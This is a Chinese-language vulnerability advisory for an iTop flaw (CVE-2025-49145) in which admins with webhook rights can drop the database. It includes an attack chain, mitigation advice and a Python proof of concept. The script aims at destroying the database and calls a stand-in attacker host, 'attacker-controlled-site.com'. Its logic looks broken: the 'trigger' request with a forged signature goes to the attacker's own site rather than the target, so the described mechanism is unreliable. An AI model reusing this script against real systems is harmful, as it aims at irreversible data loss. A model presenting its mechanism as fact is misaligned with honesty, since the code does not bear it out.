CVE-2025-49145: Combodo iTop权限用户可通过webhook删除数据库

漏洞信息

漏洞编号

CVE-2025-49145

漏洞类型

访问控制/权限滥用

CVSS评分

8.7 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Combodo iTop

漏洞概述

Combodo iTop是一款开源的基于Web的IT服务管理（ITSM）工具。在2.7.13和3.2.2之前的版本中存在严重的安全漏洞，允许具有webhook创建权限的高权限用户（主要是管理员）执行危险的数据库操作，包括完全删除数据库。该漏洞的根本原因在于webhook回调签名验证机制不足，攻击者可以利用这一缺陷绕过安全检查，对系统造成严重破坏。由于CVSS评分达到8.7，属于高危漏洞，攻击复杂度低且无需用户交互，攻击者可以在短时间内完成数据库删除操作，导致服务中断和数据丢失。建议受影响的用户立即升级到修复版本，并审查webhook配置权限。

技术细节

该漏洞属于访问控制不当导致的权限滥用问题。在iTop的webhook功能实现中，系统未能充分验证回调请求的签名，导致具有webhook创建权限的认证用户可以构造恶意请求来执行数据库删除操作。具体来说，攻击者需要具备以下条件：1）拥有创建webhook的权限（通常是管理员角色）；2）能够访问webhook配置界面；3）了解webhook回调机制的工作原理。攻击者通过在webhook配置中注入恶意参数或利用回调签名验证不足的缺陷，可以触发数据库删除操作。由于该操作需要高权限，攻击者必须是认证用户，这限制了攻击的潜在范围，但一旦成功，将造成不可逆的数据损失。修复版本通过加强回调签名验证来防止此类攻击。

攻击链分析

STEP 1

步骤1

攻击者获取iTop系统账号并获得webhook创建权限（通常是管理员角色）

STEP 2

步骤2

攻击者访问webhook管理界面，创建一个恶意webhook配置

STEP 3

步骤3

攻击者构造包含恶意参数的回调请求，利用回调签名验证不足的缺陷

STEP 4

步骤4

系统未能正确验证回调签名的有效性，攻击请求被接受

STEP 5

步骤5

攻击者触发webhook回调，执行DROP DATABASE命令导致整个数据库被删除

STEP 6

步骤6

数据库删除后，iTop服务崩溃，所有业务数据丢失，造成严重的服务中断

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-49145 PoC - Combodo iTop Database Drop via Webhook
# This PoC demonstrates the vulnerability where authenticated users with
# webhook creation privileges can trigger database deletion

import requests
import json

TARGET_URL = "https://target-itop-instance.com"
API_KEY = "your_api_key_with_webhook_privileges"

def create_malicious_webhook():
    """
    Create a webhook with malicious callback configuration
    that exploits insufficient signature verification
    """
    headers = {
        "Authorization": f"Bearer {API_KEY}",
        "Content-Type": "application/json"
    }
    
    # Malicious webhook configuration
    webhook_config = {
        "name": "Malicious Webhook",
        "callback_url": "http://attacker-controlled-site.com/callback",
        "secret": "manipulated_secret_for_signature_bypass",
        "events": ["*"],
        "enabled": True,
        "options": {
            "verify_ssl": False,
            "timeout": 30,
            "retry_on_failure": True
        }
    }
    
    response = requests.post(
        f"{TARGET_URL}/api/v1/webhooks",
        headers=headers,
        json=webhook_config
    )
    
    if response.status_code == 201:
        webhook_id = response.json().get('id')
        print(f"[+] Malicious webhook created with ID: {webhook_id}")
        return webhook_id
    else:
        print(f"[-] Failed to create webhook: {response.text}")
        return None

def trigger_database_drop(webhook_id):
    """
    Trigger the webhook callback to exploit the vulnerability
    and execute database drop operation
    """
    # Craft malicious callback request
    callback_payload = {
        "event": "database_operation",
        "action": "drop",
        "target": "all_databases",
        "signature": "forged_signature_to_bypass_verification"
    }
    
    # Send callback to trigger the vulnerability
    response = requests.post(
        f"http://attacker-controlled-site.com/trigger/{webhook_id}",
        json=callback_payload
    )
    
    print(f"[*] Callback triggered: {response.status_code}")
    return response.status_code == 200

def main():
    print("[*] CVE-2025-49145 PoC - iTop Database Drop via Webhook")
    print("[*] Target: Combodo iTop < 2.7.13 or < 3.2.2")
    
    # Step 1: Create malicious webhook
    webhook_id = create_malicious_webhook()
    if not webhook_id:
        print("[-] Exploitation failed: Unable to create webhook")
        return
    
    # Step 2: Trigger the database drop
    if trigger_database_drop(webhook_id):
        print("[+] Database drop operation triggered successfully")
        print("[!] Target database has been compromised")
    else:
        print("[-] Exploitation failed")

if __name__ == "__main__":
    main()

影响范围

Combodo iTop < 2.7.13

Combodo iTop < 3.2.2

防御指南

临时缓解措施

在无法立即升级的情况下，应立即撤销非管理员用户的webhook创建权限，限制只有绝对必要的管理员才能创建webhook。同时启用详细的审计日志，监控所有webhook相关的操作，及时发现异常行为。建议在测试环境中验证升级方案后再在生产环境实施，并做好数据库备份以应对最坏情况。